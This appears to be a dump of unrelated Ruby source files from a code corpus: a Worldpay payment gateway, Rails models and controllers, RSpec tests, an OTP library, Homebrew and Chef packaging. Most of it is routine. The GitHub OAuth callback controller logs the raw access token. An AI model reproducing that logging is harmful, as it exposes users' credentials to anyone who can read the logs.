url "https://files.pythonhosted.org/packages/c7/13/37ea7805ae3057992e96ecb1cffa2fa35c2ef4498543b846f90dd2348d8f/contextlib2-21.6.0.tar.gz"
sha256 "ab1e2bfe1d01d968e1b7e8d9023bc51ef3509bba217bb730cee3827e1ee82869"
end
resource "docopt" do
url "https://files.pythonhosted.org/packages/a2/55/8f8cab2afd404cf578136ef2cc5dfb50baa1761b68c9da1fb1e4eed343c9/docopt-0.6.2.tar.gz"
sha256 "49b3a825280bd66b3aa83585ef59c4a8c82f2c8a522dbe754a8bc8d08c85c491"
end
resource "idna" do
url "https://files.pythonhosted.org/packages/cb/38/4c4d00ddfa48abe616d7e572e02a04273603db446975ab46bbcd36552005/idna-3.2.tar.gz"
sha256 "467fbad99067910785144ce333826c71fb0e63a425657295239737f7ecd125f3"
end
resource "jsonpatch" do
url "https://files.pythonhosted.org/packages/21/67/83452af2a6db7c4596d1e2ecaa841b9a900980103013b867f2865e5e1cf0/jsonpatch-1.32.tar.gz"
sha256 "b6ddfe6c3db30d81a96aaeceb6baf916094ffa23d7dd5fa2c13e13f8b6e600c2"
end
resource "jsonpointer" do
url "https://files.pythonhosted.org/packages/6b/35/400557d3df63269a4c010cbd4865910b3c1718fbfe8d83210b216cd3efcf/jsonpointer-2.1.tar.gz"
sha256 "5a34b698db1eb79ceac454159d3f7c12a451a91f6334a4f638454327b7a89962"
end
resource "requests" do
url "https://files.pythonhosted.org/packages/e7/01/3569e0b535fb2e4a6c384bdbed00c55b9d78b5084e0fb7f4d0bf523d7670/requests-2.26.0.tar.gz"
sha256 "b8aa58f8cf793ffd8782d3d8cb19e66ef36f7aba4353eec859e74678b01b07a7"
end
resource "schema" do
url "https://files.pythonhosted.org/packages/2b/91/42bc143289fd5f032ab1b01c5da32dc162ae808a585122f27ed5bf67268f/schema-0.7.4.tar.gz"
sha256 "fbb6a52eb2d9facf292f233adcc6008cffd94343c63ccac9a1cb1f3e6de1db17"
end
resource "tqdm" do
url "https://files.pythonhosted.org/packages/37/e5/1b54ef934d731576d0145bc8ae22da5b410f96922cec52b91cc29d3ff1b6/tqdm-4.62.2.tar.gz"
sha256 "a4d6d112e507ef98513ac119ead1159d286deab17dffedd96921412c2d236ff5"
end
resource "urllib3" do
url "https://files.pythonhosted.org/packages/4f/5a/597ef5911cb8919efe4d86206aa8b2658616d676a7088f0825ca08bd7cb8/urllib3-1.26.6.tar.gz"
sha256 "f57b4c16c62fa2760b7e3d97c35b255512fb6b59a259730f36ba32ce9f8e342f"
end
def install
virtualenv_install_with_resources
bin.install_symlink libexec/"bin/ia"
end
test do
metadata = JSON.parse shell_output("#{bin}/ia metadata tigerbrew")
assert_equal metadata["metadata"]["uploader"], "[email protected]"
end
end
| 49.840909 | 148 | 0.824897 |
1ca0ae196b8623c424d21c3a4497568c77845736 | 781 | require "active_record"
require "active_record/relation"
require "active_record/relation/query_methods.rb"
module ActiveRecord::QueryMethods
def structurally_incompatible_values_for_or(other)
(ActiveRecord::Relation::SINGLE_VALUE_METHODS - [:distinct]).reject { |m| send("#{m}_value") == other.send("#{m}_value") } +
(ActiveRecord::Relation::MULTI_VALUE_METHODS - [:eager_load, :left_outer_joins, :joins, :references, :order, :extending]).reject { |m| send("#{m}_values") == other.send("#{m}_values") } +
(ActiveRecord::Relation::CLAUSE_METHODS - [:having, :where]).reject { |m| send("#{m}_clause") == other.send("#{m}_clause") } ;end;end
class Object
def to_query key = nil
"#{URI.encode(key.to_param)}=#{URI.encode(to_param.to_s)}" ;end;end
| 55.785714 | 196 | 0.693982 |
6aa7cf47f911d6a854d6e2b25b951dd4d402700d | 282 | $LOAD_PATH.unshift(File.dirname(__FILE__))
require 'config/application'
use Rack::Cors do
allow do
origins '*'
resource '*', headers: :any, methods: [:get, :post, :put, :delete, :options]
end
end
use OTR::ActiveRecord::ConnectionManagement
run GrapeOAuth2Sample::API
| 20.142857 | 80 | 0.712766 |
5d4951a145a14b5ede66887504d527cd12be2ccd | 2,600 | # A sweep represents a batch of Snapshots that were triggered simultaneously,
# such as after a deploy.
class Sweep < ActiveRecord::Base
belongs_to :project
has_many :snapshots
attr_accessor :delay_seconds
validates :title, presence: true
validates :email, format: { with: /\A.+@.+\Z/ },
allow_nil: true,
allow_blank: true
after_create :take_snapshots,
:refresh_project_last_sweep
before_create :set_start_time_from_delay_seconds
after_destroy :refresh_project_last_sweep
default_scope { order('created_at DESC') }
def delay_seconds_remaining
return nil unless start_time
return nil if start_time < Time.now
(start_time - Time.now).round
end
def pending_snapshots
snapshots.select(&:pending?)
end
def accepted_snapshots
snapshots.select(&:accepted?)
end
def rejected_snapshots
snapshots.select(&:rejected?)
end
def under_review_snapshots
snapshots.select(&:under_review?)
end
# Updates the snapshot counters and sends out an email if the sweep reaches a
# "done" state. This method is using a pessimistic locking approach to avoid
# race conditions that can cause duplicate emails to be sent and/or the
# progress counters to be stale.
#
# @see
# http://api.rubyonrails.org/classes/ActiveRecord/Locking/Pessimistic.html
# for more info on pessimistic locking.
#
# @return [Sweep] returns itself (useful for method chaining)
def refresh!
with_lock do
update_counters!
send_email_if_needed!
save!
end
self # for chaining
end
private
def update_counters!
self.count_pending = pending_snapshots.count
self.count_accepted = accepted_snapshots.count
self.count_rejected = rejected_snapshots.count
self.count_under_review = under_review_snapshots.count
end
def send_email_if_needed!
return if email.blank?
return if snapshots.count == 0
return if count_pending > 0
return if emailed_at
SweepMailer.ready_for_review(self).deliver
self.emailed_at = Time.now
end
def take_snapshots
if start_time
SweepWorker.perform_at(start_time, id)
else
SweepWorker.new.perform_with_sweep(self)
end
end
def refresh_project_last_sweep
project.refresh_last_sweep!
end
def set_start_time_from_delay_seconds
return unless delay_seconds.to_i > 0
self.start_time = Time.now + delay_seconds.to_i.seconds
end
end
| 27.659574 | 79 | 0.688077 |
018397910031a7830c455849c54419e672138b78 | 659 | require "#{Rails.root}/lib/ghauth"
class GhauthController < ApplicationController
rescue_from OAuth::Unauthorized, :with => Proc.new { redirect_to '/' }
def sign_in
redirect_to GhAuth.oauth.authorize_url(client_id: GhAuth.config['client_id'], scope: 'user:email')
end
def callback
token = GhAuth.oauth.auth_code.get_token(params[:code])
logger.error token
logger.error token.token
user = GhUser.auth(token.token)
session[:authorized_user_id] = user.id
flash[:notice] = nil
redirect_to :home
rescue => e
logger.error e.inspect
flash[:notice] = I18n.t(:failed_facebook_login)
redirect_to '/'
end
end
| 27.458333 | 102 | 0.705615 |
266ee7929043839c82003639b4087f194f40eeac | 880 | # rubocop:disable Metrics/LineLength
# == Schema Information
#
# Table name: notification_settings
#
# id :integer not null, primary key
# email_enabled :boolean default(TRUE)
# fb_messenger_enabled :boolean default(TRUE)
# mobile_enabled :boolean default(TRUE)
# setting_type :integer not null
# web_enabled :boolean default(TRUE)
# created_at :datetime not null
# updated_at :datetime not null
# user_id :integer not null, indexed
#
# Indexes
#
# index_notification_settings_on_user_id (user_id)
#
# Foreign Keys
#
# fk_rails_0c95e91db7 (user_id => users.id)
#
# rubocop:enable Metrics/LineLength
FactoryBot.define do
factory :notification_setting do
user
setting_type { rand(0..4) }
end
end
| 27.5 | 63 | 0.6125 |
aca906ae7f473370c9378f0abdecc3bc221f17f5 | 16,185 | module ActiveMerchant #:nodoc:
module Billing #:nodoc:
class WorldpayGateway < Gateway
self.test_url = 'https://secure-test.worldpay.com/jsp/merchant/xml/paymentService.jsp'
self.live_url = 'https://secure.worldpay.com/jsp/merchant/xml/paymentService.jsp'
self.default_currency = 'GBP'
self.money_format = :cents
self.supported_countries = %w(HK GB AU AD AR BE BR CA CH CN CO CR CY CZ DE DK ES FI FR GI GR HU IE IN IT JP LI LU MC MT MY MX NL NO NZ PA PE PL PT SE SG SI SM TR UM VA)
self.supported_cardtypes = [:visa, :master, :american_express, :discover, :jcb, :maestro]
self.currencies_without_fractions = %w(HUF IDR ISK JPY KRW)
self.currencies_with_three_decimal_places = %w(BHD KWD OMR RSD TND)
self.homepage_url = 'http://www.worldpay.com/'
self.display_name = 'Worldpay Global'
CARD_CODES = {
'visa' => 'VISA-SSL',
'master' => 'ECMC-SSL',
'discover' => 'DISCOVER-SSL',
'american_express' => 'AMEX-SSL',
'jcb' => 'JCB-SSL',
'maestro' => 'MAESTRO-SSL',
'diners_club' => 'DINERS-SSL',
}
def initialize(options = {})
requires!(options, :login, :password)
super
end
def purchase(money, payment_method, options = {})
MultiResponse.run do |r|
r.process { authorize(money, payment_method, options) }
r.process { capture(money, r.authorization, options.merge(:authorization_validated => true)) }
end
end
def authorize(money, payment_method, options = {})
requires!(options, :order_id)
authorize_request(money, payment_method, options)
end
def capture(money, authorization, options = {})
MultiResponse.run do |r|
r.process { inquire_request(authorization, options, 'AUTHORISED') } unless options[:authorization_validated]
if r.params
authorization_currency = r.params['amount_currency_code']
options = options.merge(:currency => authorization_currency) if authorization_currency.present?
end
r.process { capture_request(money, authorization, options) }
end
end
def void(authorization, options = {})
MultiResponse.run do |r|
r.process { inquire_request(authorization, options, 'AUTHORISED') } unless options[:authorization_validated]
r.process { cancel_request(authorization, options) }
end
end
def refund(money, authorization, options = {})
response = MultiResponse.run do |r|
r.process { inquire_request(authorization, options, 'CAPTURED', 'SETTLED', 'SETTLED_BY_MERCHANT') }
r.process { refund_request(money, authorization, options) }
end
return response if response.success?
return response unless options[:force_full_refund_if_unsettled]
void(authorization, options) if response.params['last_event'] == 'AUTHORISED'
end
# Credits only function on a Merchant ID/login/profile flagged for Payouts
# aka Credit Fund Transfers (CFT), whereas normal purchases, refunds,
# and other transactions should be performed on a normal eCom-flagged
# merchant ID.
def credit(money, payment_method, options = {})
credit_request(money, payment_method, options.merge(:credit => true))
end
def verify(credit_card, options={})
MultiResponse.run(:use_first_response) do |r|
r.process { authorize(100, credit_card, options) }
r.process(:ignore_result) { void(r.authorization, options.merge(:authorization_validated => true)) }
end
end
def supports_scrubbing
true
end
def scrub(transcript)
transcript.
gsub(%r((Authorization: Basic )\w+), '\1[FILTERED]').
gsub(%r((<cardNumber>)\d+(</cardNumber>)), '\1[FILTERED]\2').
gsub(%r((<cvc>)[^<]+(</cvc>)), '\1[FILTERED]\2')
end
private
def authorize_request(money, payment_method, options)
commit('authorize', build_authorization_request(money, payment_method, options), 'AUTHORISED', options)
end
def capture_request(money, authorization, options)
commit('capture', build_capture_request(money, authorization, options), :ok, options)
end
def cancel_request(authorization, options)
commit('cancel', build_void_request(authorization, options), :ok, options)
end
def inquire_request(authorization, options, *success_criteria)
commit('inquiry', build_order_inquiry_request(authorization, options), *success_criteria, options)
end
def refund_request(money, authorization, options)
commit('refund', build_refund_request(money, authorization, options), :ok, options)
end
def credit_request(money, payment_method, options)
commit('credit', build_authorization_request(money, payment_method, options), :ok, 'SENT_FOR_REFUND', options)
end
def build_request
xml = Builder::XmlMarkup.new :indent => 2
xml.instruct! :xml, :encoding => 'UTF-8'
xml.declare! :DOCTYPE, :paymentService, :PUBLIC, '-//WorldPay//DTD WorldPay PaymentService v1//EN', 'http://dtd.worldpay.com/paymentService_v1.dtd'
xml.tag! 'paymentService', 'version' => '1.4', 'merchantCode' => @options[:login] do
yield xml
end
xml.target!
end
def build_order_modify_request(authorization)
build_request do |xml|
xml.tag! 'modify' do
xml.tag! 'orderModification', 'orderCode' => authorization do
yield xml
end
end
end
end
def build_order_inquiry_request(authorization, options)
build_request do |xml|
xml.tag! 'inquiry' do
xml.tag! 'orderInquiry', 'orderCode' => authorization
end
end
end
def build_authorization_request(money, payment_method, options)
build_request do |xml|
xml.tag! 'submit' do
xml.tag! 'order', order_tag_attributes(options) do
xml.description(options[:description].blank? ? 'Purchase' : options[:description])
add_amount(xml, money, options)
if options[:order_content]
xml.tag! 'orderContent' do
xml.cdata! options[:order_content]
end
end
add_payment_method(xml, money, payment_method, options)
add_email(xml, options)
if options[:hcg_additional_data]
add_hcg_additional_data(xml, options)
end
if options[:instalments]
add_instalments_data(xml, options)
end
end
end
end
end
def order_tag_attributes(options)
{ 'orderCode' => options[:order_id], 'installationId' => options[:inst_id] || @options[:inst_id] }.reject { |_, v| !v }
end
def build_capture_request(money, authorization, options)
build_order_modify_request(authorization) do |xml|
xml.tag! 'capture' do
time = Time.now
xml.tag! 'date', 'dayOfMonth' => time.day, 'month' => time.month, 'year'=> time.year
add_amount(xml, money, options)
end
end
end
def build_void_request(authorization, options)
build_order_modify_request(authorization) do |xml|
xml.tag! 'cancel'
end
end
def build_refund_request(money, authorization, options)
build_order_modify_request(authorization) do |xml|
xml.tag! 'refund' do
add_amount(xml, money, options.merge(:debit_credit_indicator => 'credit'))
end
end
end
def add_amount(xml, money, options)
currency = options[:currency] || currency(money)
amount_hash = {
:value => localized_amount(money, currency),
'currencyCode' => currency,
'exponent' => currency_exponent(currency)
}
if options[:debit_credit_indicator]
amount_hash['debitCreditIndicator'] = options[:debit_credit_indicator]
end
xml.tag! 'amount', amount_hash
end
def add_payment_method(xml, amount, payment_method, options)
if payment_method.is_a?(String)
if options[:merchant_code]
xml.tag! 'payAsOrder', 'orderCode' => payment_method, 'merchantCode' => options[:merchant_code] do
add_amount(xml, amount, options)
end
else
xml.tag! 'payAsOrder', 'orderCode' => payment_method do
add_amount(xml, amount, options)
end
end
else
xml.tag! 'paymentDetails', credit_fund_transfer_attribute(options) do
xml.tag! CARD_CODES[card_brand(payment_method)] do
xml.tag! 'cardNumber', payment_method.number
xml.tag! 'expiryDate' do
xml.tag! 'date', 'month' => format(payment_method.month, :two_digits), 'year' => format(payment_method.year, :four_digits)
end
xml.tag! 'cardHolderName', options[:execute_threed] ? '3D' : payment_method.name
xml.tag! 'cvc', payment_method.verification_value
add_address(xml, (options[:billing_address] || options[:address]))
end
if options[:ip] && options[:session_id]
xml.tag! 'session', 'shopperIPAddress' => options[:ip], 'id' => options[:session_id]
else
xml.tag! 'session', 'shopperIPAddress' => options[:ip] if options[:ip]
xml.tag! 'session', 'id' => options[:session_id] if options[:session_id]
end
add_stored_credential_options(xml, options) if options[:stored_credential_usage]
end
end
end
def add_stored_credential_options(xml, options={})
if options[:stored_credential_initiated_reason]
xml.tag! 'storedCredentials', 'usage' => options[:stored_credential_usage], 'merchantInitiatedReason' => options[:stored_credential_initiated_reason] do
xml.tag! 'schemeTransactionIdentifier', options[:stored_credential_transaction_id] if options[:stored_credential_transaction_id]
end
else
xml.tag! 'storedCredentials', 'usage' => options[:stored_credential_usage]
end
end
def add_email(xml, options)
return unless options[:execute_threed] || options[:email]
xml.tag! 'shopper' do
xml.tag! 'shopperEmailAddress', options[:email] if options[:email]
xml.tag! 'browser' do
xml.tag! 'acceptHeader', options[:accept_header]
xml.tag! 'userAgentHeader', options[:user_agent]
end
end
end
def add_address(xml, address)
return unless address
address = address_with_defaults(address)
xml.tag! 'cardAddress' do
xml.tag! 'address' do
if m = /^\s*([^\s]+)\s+(.+)$/.match(address[:name])
xml.tag! 'firstName', m[1]
xml.tag! 'lastName', m[2]
end
xml.tag! 'address1', address[:address1]
xml.tag! 'address2', address[:address2] if address[:address2]
xml.tag! 'postalCode', address[:zip]
xml.tag! 'city', address[:city]
xml.tag! 'state', address[:state]
xml.tag! 'countryCode', address[:country]
xml.tag! 'telephoneNumber', address[:phone] if address[:phone]
end
end
end
def add_hcg_additional_data(xml, options)
xml.tag! 'hcgAdditionalData' do
options[:hcg_additional_data].each do |k, v|
xml.tag! 'param', {name: k.to_s}, v
end
end
end
def add_instalments_data(xml, options)
xml.tag! 'thirdPartyData' do
xml.tag! 'instalments', options[:instalments]
xml.tag! 'cpf', options[:cpf] if options[:cpf]
end
end
def address_with_defaults(address)
address ||= {}
address.delete_if { |_, v| v.blank? }
address.reverse_merge!(default_address)
end
def default_address
{
address1: 'N/A',
zip: '0000',
city: 'N/A',
state: 'N/A',
country: 'US'
}
end
def parse(action, xml)
parse_element({:action => action}, REXML::Document.new(xml))
end
def parse_element(raw, node)
node.attributes.each do |k, v|
raw["#{node.name.underscore}_#{k.underscore}".to_sym] = v
end
if node.has_elements?
raw[node.name.underscore.to_sym] = true unless node.name.blank?
node.elements.each { |e| parse_element(raw, e) }
else
raw[node.name.underscore.to_sym] = node.text unless node.text.nil?
end
raw
end
def headers(options)
headers = {
'Content-Type' => 'text/xml',
'Authorization' => encoded_credentials
}
if options[:cookie]
headers['Set-Cookie'] = options[:cookie] if options[:cookie]
end
headers
end
def commit(action, request, *success_criteria, options)
xml = ssl_post(url, request, headers(options))
raw = parse(action, xml)
if options[:execute_threed]
raw[:cookie] = @cookie
raw[:session_id] = options[:session_id]
end
success, message = success_and_message_from(raw, success_criteria)
Response.new(
success,
message,
raw,
:authorization => authorization_from(raw),
:error_code => error_code_from(success, raw),
:test => test?)
rescue ActiveMerchant::ResponseError => e
if e.response.code.to_s == '401'
return Response.new(false, 'Invalid credentials', {}, :test => test?)
else
raise e
end
end
def url
test? ? self.test_url : self.live_url
end
# Override the regular handle response so we can access the headers
# Set-Cookie value is needed for 3DS transactions
def handle_response(response)
case response.code.to_i
when 200...300
@cookie = response['Set-Cookie']
response.body
else
raise ResponseError.new(response)
end
end
# success_criteria can be:
# - a string or an array of strings (if one of many responses)
# - An array of strings if one of many responses could be considered a
# success.
def success_and_message_from(raw, success_criteria)
success = (success_criteria.include?(raw[:last_event]) || raw[:ok].present?)
if success
message = 'SUCCESS'
else
message = (raw[:iso8583_return_code_description] || raw[:error] || required_status_message(raw, success_criteria))
end
[ success, message ]
end
def error_code_from(success, raw)
unless success == 'SUCCESS'
raw[:iso8583_return_code_code] || raw[:error_code] || nil
end
end
def required_status_message(raw, success_criteria)
if(!success_criteria.include?(raw[:last_event]))
"A transaction status of #{success_criteria.collect { |c| "'#{c}'" }.join(" or ")} is required."
end
end
def authorization_from(raw)
pair = raw.detect { |k, v| k.to_s =~ /_order_code$/ }
(pair ? pair.last : nil)
end
def credit_fund_transfer_attribute(options)
return unless options[:credit]
{'action' => 'REFUND'}
end
def encoded_credentials
credentials = "#{@options[:login]}:#{@options[:password]}"
"Basic #{[credentials].pack('m').strip}"
end
def currency_exponent(currency)
return 0 if non_fractional_currency?(currency)
return 3 if three_decimal_currency?(currency)
return 2
end
end
end
end
| 36.127232 | 174 | 0.600494 |
f78242da6800413af23d52cd079f35cc42b76afe | 724 |
# Time Complexity: O(n)
# Space Complexity: O(1)
def max_sub_array(nums)
max_so_far = nums[0]
max_ending_here = nums[0]
i = 1
while i < nums.length
max_ending_here = max_ending_here + nums[i]
if max_so_far < max_ending_here
max_so_far = max_ending_here
end
if max_ending_here < 0
max_ending_here = 0
end
i += 1
end
return max_so_far
end
# Initialize:
# max_so_far = 0
# max_ending_here = 0
# Loop for each element of the array
# (a) max_ending_here = max_ending_here + a[i]
# (b) if(max_ending_here < 0)
# max_ending_here = 0
# (c) if(max_so_far < max_ending_here)
# max_so_far = max_ending_here
# return max_so_far | 23.354839 | 49 | 0.633978 |
1dbc25acda7c8fdcaad3f71fe351b03e7d1b78cf | 840 | cask 'adguard' do
version '2.1.3.600'
sha256 '40a56f23f0424c3c8242e9de75871803d2a6f9affcabb9031e57657eebbd6a5b'
url "https://static.adguard.com/mac/release/AdGuard-#{version}.dmg"
appcast 'https://static.adguard.com/mac/adguard-release-appcast.xml'
name 'Adguard'
homepage 'https://adguard.com/'
pkg 'AdGuard.pkg'
uninstall pkgutil: 'com.adguard.mac.adguard-pkg'
zap trash: [
'/Library/Application Support/com.adguard.Adguard',
'~/Library/Application Support/Adguard',
'~/Library/Application Support/com.adguard.Adguard',
'~/Library/Caches/com.adguard.Adguard',
'~/Library/Cookies/com.adguard.Adguard.binarycookies',
'~/Library/Logs/Adguard',
'~/Library/Preferences/com.adguard.Adguard.plist',
]
end
| 35 | 75 | 0.65119 |
1ae9e651d448b8fe23a73de8e8df06c25c8b7434 | 1,895 | require 'spec_helper'
describe "Shipping Methods", :type => :feature do
stub_authorization!
let!(:zone) { create(:global_zone) }
let!(:shipping_method) { create(:shipping_method, :zones => [zone]) }
after do
Capybara.ignore_hidden_elements = true
end
before do
Capybara.ignore_hidden_elements = false
# HACK: To work around no email prompting on check out
allow_any_instance_of(Spree::Order).to receive_messages(:require_email => false)
create(:check_payment_method, :environment => 'test')
visit spree.admin_path
click_link "Settings"
click_link "Shipping Methods"
end
context "show" do
it "should display existing shipping methods" do
within_row(1) do
expect(column_text(1)).to eq(shipping_method.name)
expect(column_text(2)).to eq(zone.name)
expect(column_text(3)).to eq("Flat rate")
expect(column_text(4)).to eq("Both")
end
end
end
context "create" do
it "should be able to create a new shipping method" do
click_link "New Shipping Method"
fill_in "shipping_method_name", :with => "bullock cart"
within("#shipping_method_categories_field") do
check first("input[type='checkbox']")["name"]
end
click_on "Create"
expect(current_path).to eql(spree.edit_admin_shipping_method_path(Spree::ShippingMethod.last))
end
end
# Regression test for #1331
context "update" do
it "can change the calculator", :js => true do
within("#listing_shipping_methods") do
click_icon :edit
end
expect(find(:css, ".calculator-settings-warning")).not_to be_visible
select2_search('Flexible Rate', :from => 'Calculator')
expect(find(:css, ".calculator-settings-warning")).to be_visible
click_button "Update"
expect(page).not_to have_content("Shipping method is not found")
end
end
end
| 29.153846 | 100 | 0.681266 |
d57c07a7d58849f69a37b357c9ed5bfeabd5ffdc | 4,287 | RSpec.describe MetasploitDataModels::Search::Operation::Port::Range, type: :model do
subject(:port_range_operation) {
described_class.new(
value: formatted_value
)
}
let(:formatted_value) {
'1'
}
it { is_expected.to be_a MetasploitDataModels::Search::Operation::Range }
context 'validations' do
before(:example) do
port_range_operation.valid?
end
context 'errors on #value' do
subject(:value_errors) {
port_range_operation.errors[:value]
}
context 'with Range' do
context 'with Integers' do
context 'covered by MetasploitDataModels::Search::Operation::Port::Number::RANGE' do
let(:formatted_value) {
'1-2'
}
it { is_expected.to be_empty }
end
# this can't actually happen because the minimum is 0 and a negative number can't be parsed, but validation
# is there in case @value is set directly.
context 'without Range#begin covered by MetasploitDataModels::Search::Operation::Port::Number::RANGE' do
let(:error) {
I18n.translate!(
'metasploit.model.errors.models.metasploit_data_models/search/operation/port/range.attributes.value.port_range_extreme_inclusion',
extreme: :begin,
extreme_value: range_begin,
maximum: MetasploitDataModels::Search::Operation::Port::Number::MAXIMUM,
minimum: MetasploitDataModels::Search::Operation::Port::Number::MINIMUM
)
}
let(:formatted_value) {
nil
}
let(:port_range_operation) {
super().tap { |port_range_operation|
port_range_operation.instance_variable_set(:@value, Range.new(range_begin, range_end))
}
}
let(:range_begin) {
-1
}
let(:range_end) {
1
}
it { is_expected.to include error }
end
context 'without Range#begin covered by MetasploitDataModels::Search::Operation::Port::Number::RANGE' do
let(:error) {
I18n.translate!(
'metasploit.model.errors.models.metasploit_data_models/search/operation/port/range.attributes.value.port_range_extreme_inclusion',
extreme: :end,
extreme_value: range_end,
maximum: MetasploitDataModels::Search::Operation::Port::Number::MAXIMUM,
minimum: MetasploitDataModels::Search::Operation::Port::Number::MINIMUM
)
}
let(:formatted_value) {
"0-#{range_end}"
}
let(:range_end) {
MetasploitDataModels::Search::Operation::Port::Number::MAXIMUM + 1
}
it { is_expected.to include error }
end
end
context 'without Integers' do
let(:begin_error) {
I18n.translate!(
'metasploit.model.errors.models.metasploit_data_models/search/operation/port/range.attributes.value.port_range_extreme_not_an_integer',
extreme: :begin,
extreme_value: range_begin
)
}
let(:end_error) {
I18n.translate!(
'metasploit.model.errors.models.metasploit_data_models/search/operation/port/range.attributes.value.port_range_extreme_not_an_integer',
extreme: :end,
extreme_value: range_end
)
}
let(:formatted_value) {
"#{range_begin}-#{range_end}"
}
let(:range_begin) {
'a'
}
let(:range_end) {
'b'
}
it { is_expected.to include begin_error }
it { is_expected.to include end_error }
end
end
context 'without Range' do
let(:error) {
I18n.translate!('metasploit.model.errors.models.metasploit_data_models/search/operation/range.attributes.value.range')
}
let(:formatted_value) {
'1'
}
it { is_expected.to include(error) }
end
end
end
end | 31.065217 | 153 | 0.560765 |
6a5d003e87f048190f15202478b7bcb2ec9f7161 | 2,936 | # encoding: UTF-8
require 'spec_helper'
describe Banzai::Filter::TableOfContentsFilter, lib: true do
include FilterSpecHelper
def header(level, text)
"<h#{level}>#{text}</h#{level}>\n"
end
it 'does nothing when :no_header_anchors is truthy' do
exp = act = header(1, 'Header')
expect(filter(act, no_header_anchors: 1).to_html).to eq exp
end
it 'does nothing with empty headers' do
exp = act = header(1, nil)
expect(filter(act).to_html).to eq exp
end
1.upto(6) do |i|
it "processes h#{i} elements" do
html = header(i, "Header #{i}")
doc = filter(html)
expect(doc.css("h#{i} a").first.attr('id')).to eq "header-#{i}"
end
end
describe 'anchor tag' do
it 'has an `anchor` class' do
doc = filter(header(1, 'Header'))
expect(doc.css('h1 a').first.attr('class')).to eq 'anchor'
end
it 'links to the id' do
doc = filter(header(1, 'Header'))
expect(doc.css('h1 a').first.attr('href')).to eq '#header'
end
describe 'generated IDs' do
it 'translates spaces to dashes' do
doc = filter(header(1, 'This header has spaces in it'))
expect(doc.css('h1 a').first.attr('id')).to eq 'this-header-has-spaces-in-it'
end
it 'squeezes multiple spaces and dashes' do
doc = filter(header(1, 'This---header is poorly-formatted'))
expect(doc.css('h1 a').first.attr('id')).to eq 'this-header-is-poorly-formatted'
end
it 'removes punctuation' do
doc = filter(header(1, "This, header! is, filled. with @ punctuation?"))
expect(doc.css('h1 a').first.attr('id')).to eq 'this-header-is-filled-with-punctuation'
end
it 'appends a unique number to duplicates' do
doc = filter(header(1, 'One') + header(2, 'One'))
expect(doc.css('h1 a').first.attr('id')).to eq 'one'
expect(doc.css('h2 a').first.attr('id')).to eq 'one-1'
end
it 'supports Unicode' do
doc = filter(header(1, '한글'))
expect(doc.css('h1 a').first.attr('id')).to eq '한글'
expect(doc.css('h1 a').first.attr('href')).to eq '#한글'
end
end
end
describe 'result' do
def result(html)
HTML::Pipeline.new([described_class]).call(html)
end
let(:results) { result(header(1, 'Header 1') + header(2, 'Header 2')) }
let(:doc) { Nokogiri::XML::DocumentFragment.parse(results[:toc]) }
it 'is contained within a `ul` element' do
expect(doc.children.first.name).to eq 'ul'
expect(doc.children.first.attr('class')).to eq 'section-nav'
end
it 'contains an `li` element for each header' do
expect(doc.css('li').length).to eq 2
links = doc.css('li a')
expect(links.first.attr('href')).to eq '#header-1'
expect(links.first.text).to eq 'Header 1'
expect(links.last.attr('href')).to eq '#header-2'
expect(links.last.text).to eq 'Header 2'
end
end
end
| 29.959184 | 95 | 0.604564 |
abaf1bd60b452cb704432fa93ac947d537d86637 | 1,791 | require "otp/utils"
require "otp/base32"
require "otp/uri"
module OTP
class Base
include OTP::Utils
DEFAULT_DIGITS = 6
DEFAULT_ALGORITHM = "SHA1"
attr_accessor :secret, :algorithm, :digits
attr_accessor :issuer, :accountname
def initialize(secret=nil, algorithm=nil, digits=nil)
self.secret = secret
self.algorithm = algorithm || DEFAULT_ALGORITHM
self.digits = digits || DEFAULT_DIGITS
end
def new_secret(num_bytes=10)
self.raw_secret = OpenSSL::Random.random_bytes(num_bytes)
end
def raw_secret=(bytes)
self.secret = OTP::Base32.encode(bytes)
end
def raw_secret
return OTP::Base32.decode(secret)
end
def moving_factor
raise NotImplementedError
end
def password(generation=0)
return otp(algorithm, raw_secret, moving_factor+generation, digits)
end
def verify(given_pw, last:0, post:0)
raise ArgumentError, "last must be greater than or equal to 0" if last < 0
raise ArgumentError, "post must be greater than or equal to 0" if post < 0
return false if given_pw.nil? || given_pw.empty?
return (-last..post).any?{|i| otp_compare(password(i), given_pw) }
end
def to_uri
return OTP::URI.format(self)
end
def uri_params
params = {}
params[:secret] = secret
params[:issuer] = issuer if issuer
params[:algorithm] = algorithm if algorithm != DEFAULT_ALGORITHM
params[:digits] = digits if digits != DEFAULT_DIGITS
return params
end
def extract_uri_params(params)
self.secret = params["secret"]
self.issuer = issuer || params["issuer"]
self.algorithm = params["algorithm"] || algorithm
self.digits = (params["digits"] || digits).to_i
end
end
end
| 25.956522 | 80 | 0.6622 |
33d15cd89f786bcdefa46833ddfcdec92f60b98a | 1,946 | Chef::Log.info("mysql-memcached : source install dependencies")
package 'cmake' do
:upgrade
end
package 'bison' do
:upgrade
end
package 'libncurses5-dev' do
:upgrade
end
include_recipe "ri_mysql_memcached_plugin::client"
Chef::Log.info("mysql-memcached : download source")
remote_file "#{node[:mysql][:build_dir]}/mysql-#{node[:mysql][:version]}.tar.gz" do
source "#{node[:rawiron][:backends_url]}/mysql-#{node[:mysql][:version]}.tar.gz"
end
execute "tar xzvf mysql-#{node[:mysql][:version]}.tar.gz" do
cwd "#{node[:mysql][:build_dir]}"
end
Chef::Log.info("mysql-memcached : create user mysql")
group node[:mysql][:group] do
system true
end
user node[:mysql][:user] do
gid node[:mysql][:group]
shell "/bin/bash"
home node[:mysql][:datadir]
system true
end
Chef::Log.info("mysql-memcached : create /var directories")
directory node[:mysql][:datadir] do
owner node[:mysql][:user]
group node[:mysql][:group]
mode 0750
not_if { ::File.exists?(node[:mysql][:datadir]) }
end
directory node[:mysql][:logdir] do
owner node[:mysql][:user]
mode 0755
action :create
not_if { ::File.exists?(node[:mysql][:logdir]) }
end
directory node[:mysql][:rundir] do
owner node[:mysql][:user]
group node[:mysql][:group]
mode 0755
not_if { ::File.exists?(node[:mysql][:rundir]) }
end
Chef::Log.info("mysql-memcached : make install")
execute "make install" do
cwd "#{node[:mysql][:build_dir]}/mysql-#{node[:mysql][:version]}"
command <<-EOH
cmake . -DWITH_INNODB_MEMCACHED=ON
make
make install
EOH
end
Chef::Log.info("mysql-memcached : install db")
execute "install system catalog" do
cwd "#{node[:mysql][:source_basedir]}"
command <<-EOH
./scripts/mysql_install_db --datadir=#{node[:mysql][:datadir]} --user=#{node[:mysql][:user]} --no-defaults
chown -R root .
chown -R #{node[:mysql][:user]} data
EOH
end | 23.731707 | 110 | 0.65519 |
